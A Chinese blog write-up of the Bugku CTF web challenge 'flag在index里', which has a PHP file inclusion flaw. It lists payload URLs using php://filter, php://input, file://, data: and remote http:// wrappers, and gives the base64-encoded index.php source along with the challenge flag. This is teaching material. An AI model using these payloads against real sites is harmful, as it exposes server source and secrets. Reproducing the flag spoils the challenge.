Bugku web——flag在index里

最新推荐文章于 2020-06-23 09:26:27 发布
最新推荐文章于 2020-06-23 09:26:27 发布
阅读量369 收藏 1
点赞数
分类专栏: ctf总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40481505/article/details/100530154
版权

打开题目链接,点击“click me”,发现其连接为:

http://123.206.87.240:8005/post/index.php?file=show.php

说明index.php使用了文件包含,因此可以利用php文件包含漏洞

此漏洞有下面几种利用方法

  1. php://filter
    使用方法:http://123.206.87.240:8005/post/index.php?file=php://filter/resource/file
    当file为非php文件时,导致include失败,并输出file内容
    当file为php文件时,会使include成功,并输出执行结果
    若想要将php文件输出,需要先进行base64编码:
	http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource/file

再将获得的编码解码即可

  1. php://input
    使用方法:将要执行的语法php代码直接通过post提交在这里插入图片描述

  2. file://
    使用方法:http://123.206.87.240:8005/post/index.php?file=file://var/www/index.html
    效果和php://filter相同,但注意只可使用绝对路径

  3. data:
    使用方法:http://123.206.87.240:8005/post/index.php?file=data: text/plain,<?php echo "hello"; >
    效果和php://input相同

  4. http://
    使用方法:http://123.206.87.240:8005/post/index.php?file=http://www.a.com/file
    上面几种属于本地包含,而http://为 外部包含,可包含网络上的文件

解出此题需要用到php://filter/read=convert.base64-encode/resource=index.php
获得base64码

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

解码可得到flag
在这里插入图片描述

彬彬逊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku web flagindex
thinszx的博客
03-09 259
题目描述 看到了点击以后的url,尝试了一下?file=index.php,结果失败,啥都没有,上网搜了一下题解,发现这是php中的伪协议 php伪协议 在php中,有
bugku_web flagindex
didid_w的博客
05-01 588
打开网页:点击之后url变成了:看到?file=show.php在结合题目 flagindex 很容易想到文件包含试试:http://120.24.86.145:8005/post/index.php?file=file_get_contents(index.php)在试了其他的文件读取函数发现什么都没输出,说明可能有过滤条件得绕过过滤通过php伪协议利用PHP://filter/read=c...
bugku-web-flagindex
a3uRa的一个窝
08-22 372
最近好忙啊 不说了,开始题目吧 进入页面 click me?no 点击 发现url变成了 http://120.24.86.145:8005/post/index.php?file=show.php flagindex面 尝试?file=index.php 不行没有任何返回 尝试 ?file=php://filter/convert.base64-encode...
Bugkuweb flagindex
qq_26961571的博客
06-23 867
这道题本来以为是简单抓包题,没想到是文件包含题目,让我打开了新世界大门。 老规矩,先打开他要求的网页查看。 查看源代码。 并没有什么东西。 点击了之后也是出现一行字。 源代码也没有任何东西。 这时候想到抓包,看了老半天的包,面也是啥都没发现。只能百度了 百度说这是文件包含漏洞,给了一串url命令,主要是让file=index的意思,这岂不是完全依赖于题目提示了,看来题目还是非常关键的东西。 http://123.206...
BugkuCTF】Web--flagindex
VZZmieshenquan的博客
02-08 241
Description: http://123.206.87.240:8005/post/ Solution: 进入网页点击链接以后查看网址发现有可以读取本地php的参数题目说明flagindex,所以我就直接把show改成了php,但是发现网页内容为空,所以就用php://filter伪协议来读取本地php文件 将网址改成 http://123.206.87.240:8005/pos...
bugkuctf解题-WEB
05-04
在CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
web扫flag的python文件
12-14
web扫flag的一个python文件,怎么用就不用说了吧,随便在一个有python3.0或2.0的机子上就能用了,不过你那个flag的路径在哪,那么你在py文件中的flag路径也得改哈,别傻福福的直接用
ctf web解题 找flag夺旗赛
最新发布
05-19
在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,尤其在Web安全领域中备受关注。CTF Web解题比赛通常涉及到各种Web安全技术,包括但不限于SQL注入、XSS跨站脚本、文件包含漏洞、命令注入、CSRF跨站...
webflag-开源
04-26
【标题】"webflag-开源"所代表的知识点主要集中在两个方面:一是开源软件的性质,二是关于魔兽世界(World of Warcraft,简称WoW)的角色扮演(Role Playing,简称RP)社区及其相关工具。 首先,我们来理解"开源...
【HackPack CTF】 WEB——持续更新中
12-21
题目地址 ...打开是酱紫 sui便打开一个404找不到 先演示错误思路: Plan A.... 上bp抓包,Ctrl + I,爆破点为/后的数字比如1,sniper狙击手模式, ...很不幸,无一幸免,全都flag标记阵亡了 换思路,找宝藏,要想有地图,hi
BugkuCTF–flagindex
热门推荐
超人学飞的日子
06-05 4万+
题目地址http://120.24.86.145:8005/post/这道题目有经典的本地文件包含漏洞+php伪协议的结合应用点击后注意到url地址  http://120.24.86.145:8005/post/index.php?file=show.php这是一个典型的文件包含漏洞,(file关键字是提示,其实也是CTF的套路)。这用到了php的封装协议:http://php.net/ma...
BugkuCTF-WEB-flagindex
烟雨天青色
08-27 2558
这道题打开题目链接之后,页面只显示了一个名为“click me?no”的超链接,点开它。 点开之后可以发现页面变成的如图所示的样子,注意网页的url,根据url基本可以判断,这道题目属于文件包含类漏洞。 现在已知是文件包含漏洞的题目了,下一步我们就需要去读取被包含文件的内容,使用php://filter伪协议,具体如下: php://filter/read=convert.base...
flagindex,php://filter协议
wssmiss的博客
03-06 739
题目连接http://123.206.87.240:8005/post/ 题目 点击之后出现 地址栏:http://123.206.87.240:8005/post/index.php?file=show.php 观察此题的切入点应该在文件包含漏洞,而且是php ...
Bugku-CTF之域名解析(听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag)
weixin_34163553的博客
04-20 3829
Day 7 域名解析 50 听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag 本题要点: host配置文件 方法一: 修改hosts文件,路径为C:\Windows\System32\drivers\etc\hosts 在最底下添加: flag.bugku.com120.24.86....
CTF/CTF练习平台-flagindex【php://filter的利用】
Sp4rkW的博客
08-20 4万+
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://12...
bugku ctf flagindex
qq_42777804的博客
05-18 590
点击click me? no 注意到 http://123.206.87.240:8005/post/index.php?file=show.php 这是一个典型的文件包含漏洞,(file关键字是提示) 之后查阅用法: php://filter php://filter是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)...
ctf web3 30 flag就在这快来找找吧http://123.206.87.240:8002/web3
MIGENGKING的博客
06-13 7442
这节我们来破解一个HTML密码。 打开题目有提示“flag就在这”的页面,总是打不开页面: 这时我们可以按“Fn+F12”(或者按“ctrl+U”)直接查看页面源码: 这是我们就需要把页面的HYML源代码在线解码一下(是解码!!): 但我们提交flag时提交(KEY{J2sa42ahJK-HS11III}) 这我们应该了解一些关于ctf常见代码: 1.Base32加密: 例:KRUG...
bugku flagindex
Seaern的博客
07-02 300
题目链接 第二个界面发现url为: http://123.206.87.240:8005/post/index.php?file=show.php 参数有file选项,联想到了文件包含漏洞 结合题目提示: flagindex 通过PHP内置协议直接读取代码 PHP内置协议 通过构造如下语句: http://xxx.com/index.php?file=php://fil...
BugkuCTF - 练习平台 - WEB——Writeup
今天吃什么
02-14 1414
1.web2 F12直接查看 2.计算器 发现可输入字符的最大长度为1,可以根据情况改长 3.web基础GET∗∗![在这插入图片描述](https://img−blog.csdnimg.cn/20190214190622763.png)直接在地址栏传参‘what=flag‘即可![在这插入图片描述](https://img−blog.csdnimg.cn/201902141907414...
CTF挑战:Web安全漏洞——任意文件上传与下载实战
在CTF(Capture The Flag)竞赛中,特别是在Web安全领域,"任意文件上传+任意文件下载"是一个常见的挑战,涉及到黑客技术的运用和Web应用程序的安全漏洞利用。这类题目通常要求参赛者通过精心构造的HTTP请求,上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值